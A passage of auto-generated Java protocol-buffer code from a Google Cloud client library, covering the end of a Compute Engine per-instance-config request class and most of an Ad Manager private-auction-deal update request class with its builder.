perInstanceConfigsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addAllPerInstanceConfigs( java.lang.Iterable<? extends com.google.cloud.compute.v1.PerInstanceConfig> values) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, perInstanceConfigs_); onChanged(); } else { perInstanceConfigsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder clearPerInstanceConfigs() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { perInstanceConfigsBuilder_.clear(); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder removePerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.remove(index); onChanged(); } else { perInstanceConfigsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder getPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<? extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { if (perInstanceConfigsBuilder_ != null) { return perInstanceConfigsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder() { return getPerInstanceConfigsFieldBuilder() .addBuilder(com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder() .addBuilder(index, com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig.Builder> getPerInstanceConfigsBuilderList() { return getPerInstanceConfigsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsFieldBuilder() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder>( perInstanceConfigs_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); perInstanceConfigs_ = null; } return perInstanceConfigsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) } // @@protoc_insertion_point(class_scope:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) private static final com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq(); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<InstanceGroupManagersUpdatePerInstanceConfigsReq> PARSER = new com.google.protobuf.AbstractParser< InstanceGroupManagersUpdatePerInstanceConfigsReq>() { @java.lang.Override public InstanceGroupManagersUpdatePerInstanceConfigsReq parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException() .setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<InstanceGroupManagersUpdatePerInstanceConfigsReq> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<InstanceGroupManagersUpdatePerInstanceConfigsReq> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,850
java-admanager/proto-ad-manager-v1/src/main/java/com/google/ads/admanager/v1/UpdatePrivateAuctionDealRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/admanager/v1/private_auction_deal_service.proto // Protobuf Java Version: 3.25.8 package com.google.ads.admanager.v1; /** * * * <pre> * Request object for `UpdatePrivateAuctionDeal` method. * </pre> * * Protobuf type {@code google.ads.admanager.v1.UpdatePrivateAuctionDealRequest} */ public final class UpdatePrivateAuctionDealRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) UpdatePrivateAuctionDealRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdatePrivateAuctionDealRequest.newBuilder() to construct. private UpdatePrivateAuctionDealRequest( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdatePrivateAuctionDealRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdatePrivateAuctionDealRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.class, com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.Builder.class); } private int bitField0_; public static final int PRIVATE_AUCTION_DEAL_FIELD_NUMBER = 1; private com.google.ads.admanager.v1.PrivateAuctionDeal privateAuctionDeal_; /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the privateAuctionDeal field is set. */ @java.lang.Override public boolean hasPrivateAuctionDeal() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The privateAuctionDeal. */ @java.lang.Override public com.google.ads.admanager.v1.PrivateAuctionDeal getPrivateAuctionDeal() { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder getPrivateAuctionDealOrBuilder() { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getPrivateAuctionDeal()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getPrivateAuctionDeal()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest)) { return super.equals(obj); } com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest other = (com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) obj; if (hasPrivateAuctionDeal() != other.hasPrivateAuctionDeal()) return false; if (hasPrivateAuctionDeal()) { if (!getPrivateAuctionDeal().equals(other.getPrivateAuctionDeal())) return false; } if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasPrivateAuctionDeal()) { hash = (37 * hash) + PRIVATE_AUCTION_DEAL_FIELD_NUMBER; hash = (53 * hash) + getPrivateAuctionDeal().hashCode(); } if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request object for `UpdatePrivateAuctionDeal` method. * </pre> * * Protobuf type {@code google.ads.admanager.v1.UpdatePrivateAuctionDealRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.class, com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.Builder.class); } // Construct using com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getPrivateAuctionDealFieldBuilder(); getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; privateAuctionDeal_ = null; if (privateAuctionDealBuilder_ != null) { privateAuctionDealBuilder_.dispose(); privateAuctionDealBuilder_ = null; } updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_descriptor; } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest getDefaultInstanceForType() { return com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest build() { com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest buildPartial() { com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest result = new com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.privateAuctionDeal_ = privateAuctionDealBuilder_ == null ? privateAuctionDeal_ : privateAuctionDealBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) { return mergeFrom((com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest other) { if (other == com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.getDefaultInstance()) return this; if (other.hasPrivateAuctionDeal()) { mergePrivateAuctionDeal(other.getPrivateAuctionDeal()); } if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getPrivateAuctionDealFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.ads.admanager.v1.PrivateAuctionDeal privateAuctionDeal_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.admanager.v1.PrivateAuctionDeal, com.google.ads.admanager.v1.PrivateAuctionDeal.Builder, com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder> privateAuctionDealBuilder_; /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the privateAuctionDeal field is set. */ public boolean hasPrivateAuctionDeal() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The privateAuctionDeal. */ public com.google.ads.admanager.v1.PrivateAuctionDeal getPrivateAuctionDeal() { if (privateAuctionDealBuilder_ == null) { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } else { return privateAuctionDealBuilder_.getMessage(); } } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setPrivateAuctionDeal(com.google.ads.admanager.v1.PrivateAuctionDeal value) { if (privateAuctionDealBuilder_ == null) { if (value == null) { throw new NullPointerException(); } privateAuctionDeal_ = value; } else { privateAuctionDealBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setPrivateAuctionDeal( com.google.ads.admanager.v1.PrivateAuctionDeal.Builder builderForValue) { if (privateAuctionDealBuilder_ == null) { privateAuctionDeal_ = builderForValue.build(); } else { privateAuctionDealBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergePrivateAuctionDeal(com.google.ads.admanager.v1.PrivateAuctionDeal value) { if (privateAuctionDealBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && privateAuctionDeal_ != null && privateAuctionDeal_ != com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance()) { getPrivateAuctionDealBuilder().mergeFrom(value); } else { privateAuctionDeal_ = value; } } else { privateAuctionDealBuilder_.mergeFrom(value); } if (privateAuctionDeal_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearPrivateAuctionDeal() { bitField0_ = (bitField0_ & ~0x00000001); privateAuctionDeal_ = null; if (privateAuctionDealBuilder_ != null) { privateAuctionDealBuilder_.dispose(); privateAuctionDealBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.ads.admanager.v1.PrivateAuctionDeal.Builder getPrivateAuctionDealBuilder() { bitField0_ |= 0x00000001; onChanged(); return getPrivateAuctionDealFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder getPrivateAuctionDealOrBuilder() { if (privateAuctionDealBuilder_ != null) { return privateAuctionDealBuilder_.getMessageOrBuilder(); } else { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.admanager.v1.PrivateAuctionDeal, com.google.ads.admanager.v1.PrivateAuctionDeal.Builder, com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder> getPrivateAuctionDealFieldBuilder() { if (privateAuctionDealBuilder_ == null) { privateAuctionDealBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.admanager.v1.PrivateAuctionDeal, com.google.ads.admanager.v1.PrivateAuctionDeal.Builder, com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder>( getPrivateAuctionDeal(), getParentForChildren(), isClean()); privateAuctionDeal_ = null; } return privateAuctionDealBuilder_; } private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Required. The list of fields to update. * </pre> * * 